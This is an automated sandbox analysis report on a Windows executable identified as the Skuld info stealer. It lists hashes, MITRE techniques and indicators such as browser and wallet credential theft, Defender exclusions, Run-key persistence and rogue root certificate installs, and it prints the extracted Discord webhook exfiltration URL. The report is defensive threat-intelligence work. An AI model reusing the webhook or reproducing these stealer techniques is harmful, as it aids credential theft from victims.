skuld | fa5e08c10b5436ce62146da3783126a903a7e1d545f10c1a0984f40daf8c1d35

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
21-08-2024 16:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Dream R6 (1).exe
Size

6.1MB
MD5

098079241a31077ce464dedd564d5965
SHA1

5a4a1395ce3f7aca2de4eba960e579bc91ec2a07
SHA256

fa5e08c10b5436ce62146da3783126a903a7e1d545f10c1a0984f40daf8c1d35
SHA512

f70f1996406ea498e6e2d871d05803ba121bb4fc3a35250aea626df612446d7d197aba9cfe7293534fd76fcd88721ed406349d74b747c43d2a5d9846866fed51
SSDEEP

98304:OL8TZt27hpBDNQZx92UWUfeeM81EztJwRla6dewnqOQL7Xwivl/gn6MsyB:OwY1PL8GfNURsRe87jdQc

Score

10^/10

skuld credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1275570777562943619/CfD-pRhASNI97yrXg8BssfRJRJrGeagBhz72dQfdjXc70hZ50lirmSwHec53Jx0RZ28B

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3292	powershell.exe
2560	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	7626342d-72a5-f113-464a-9e601517bf61.exe

Executes dropped EXE 1 IoCs

pid	Process
2444	7626342d-72a5-f113-464a-9e601517bf61.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	7626342d-72a5-f113-464a-9e601517bf61.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	discord.com
26	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	api.ipify.org
8	api.ipify.org
11	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	7626342d-72a5-f113-464a-9e601517bf61.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	7626342d-72a5-f113-464a-9e601517bf61.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1788	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4564	wmic.exe
3404	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	12	Go-http-client/1.1

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133687304199935139"	chrome.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	7626342d-72a5-f113-464a-9e601517bf61.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	7626342d-72a5-f113-464a-9e601517bf61.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	7626342d-72a5-f113-464a-9e601517bf61.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	7626342d-72a5-f113-464a-9e601517bf61.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	7626342d-72a5-f113-464a-9e601517bf61.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	7626342d-72a5-f113-464a-9e601517bf61.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
3292	powershell.exe
3292	powershell.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2560	powershell.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2560	powershell.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe
2444	7626342d-72a5-f113-464a-9e601517bf61.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
408	chrome.exe
408	chrome.exe
408	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2444	7626342d-72a5-f113-464a-9e601517bf61.exe
Token: SeIncreaseQuotaPrivilege	1936	wmic.exe
Token: SeSecurityPrivilege	1936	wmic.exe
Token: SeTakeOwnershipPrivilege	1936	wmic.exe
Token: SeLoadDriverPrivilege	1936	wmic.exe
Token: SeSystemProfilePrivilege	1936	wmic.exe
Token: SeSystemtimePrivilege	1936	wmic.exe
Token: SeProfSingleProcessPrivilege	1936	wmic.exe
Token: SeIncBasePriorityPrivilege	1936	wmic.exe
Token: SeCreatePagefilePrivilege	1936	wmic.exe
Token: SeBackupPrivilege	1936	wmic.exe
Token: SeRestorePrivilege	1936	wmic.exe
Token: SeShutdownPrivilege	1936	wmic.exe
Token: SeDebugPrivilege	1936	wmic.exe
Token: SeSystemEnvironmentPrivilege	1936	wmic.exe
Token: SeRemoteShutdownPrivilege	1936	wmic.exe
Token: SeUndockPrivilege	1936	wmic.exe
Token: SeManageVolumePrivilege	1936	wmic.exe
Token: 33	1936	wmic.exe
Token: 34	1936	wmic.exe
Token: 35	1936	wmic.exe
Token: 36	1936	wmic.exe
Token: SeIncreaseQuotaPrivilege	1936	wmic.exe
Token: SeSecurityPrivilege	1936	wmic.exe
Token: SeTakeOwnershipPrivilege	1936	wmic.exe
Token: SeLoadDriverPrivilege	1936	wmic.exe
Token: SeSystemProfilePrivilege	1936	wmic.exe
Token: SeSystemtimePrivilege	1936	wmic.exe
Token: SeProfSingleProcessPrivilege	1936	wmic.exe
Token: SeIncBasePriorityPrivilege	1936	wmic.exe
Token: SeCreatePagefilePrivilege	1936	wmic.exe
Token: SeBackupPrivilege	1936	wmic.exe
Token: SeRestorePrivilege	1936	wmic.exe
Token: SeShutdownPrivilege	1936	wmic.exe
Token: SeDebugPrivilege	1936	wmic.exe
Token: SeSystemEnvironmentPrivilege	1936	wmic.exe
Token: SeRemoteShutdownPrivilege	1936	wmic.exe
Token: SeUndockPrivilege	1936	wmic.exe
Token: SeManageVolumePrivilege	1936	wmic.exe
Token: 33	1936	wmic.exe
Token: 34	1936	wmic.exe
Token: 35	1936	wmic.exe
Token: 36	1936	wmic.exe
Token: SeIncreaseQuotaPrivilege	4564	wmic.exe
Token: SeSecurityPrivilege	4564	wmic.exe
Token: SeTakeOwnershipPrivilege	4564	wmic.exe
Token: SeLoadDriverPrivilege	4564	wmic.exe
Token: SeSystemProfilePrivilege	4564	wmic.exe
Token: SeSystemtimePrivilege	4564	wmic.exe
Token: SeProfSingleProcessPrivilege	4564	wmic.exe
Token: SeIncBasePriorityPrivilege	4564	wmic.exe
Token: SeCreatePagefilePrivilege	4564	wmic.exe
Token: SeBackupPrivilege	4564	wmic.exe
Token: SeRestorePrivilege	4564	wmic.exe
Token: SeShutdownPrivilege	4564	wmic.exe
Token: SeDebugPrivilege	4564	wmic.exe
Token: SeSystemEnvironmentPrivilege	4564	wmic.exe
Token: SeRemoteShutdownPrivilege	4564	wmic.exe
Token: SeUndockPrivilege	4564	wmic.exe
Token: SeManageVolumePrivilege	4564	wmic.exe
Token: 33	4564	wmic.exe
Token: 34	4564	wmic.exe
Token: 35	4564	wmic.exe
Token: 36	4564	wmic.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe
408	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4968 wrote to memory of 2204	4968	Dream R6 (1).exe	85
PID 4968 wrote to memory of 2204	4968	Dream R6 (1).exe	85
PID 2204 wrote to memory of 2444	2204	cmd.exe	86
PID 2204 wrote to memory of 2444	2204	cmd.exe	86
PID 2444 wrote to memory of 2300	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	88
PID 2444 wrote to memory of 2300	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	88
PID 2444 wrote to memory of 5056	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	90
PID 2444 wrote to memory of 5056	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	90
PID 2444 wrote to memory of 1936	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	92
PID 2444 wrote to memory of 1936	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	92
PID 2444 wrote to memory of 4564	2444	7626342d-72a5-f113-464a-9e601517bf61.exe	94
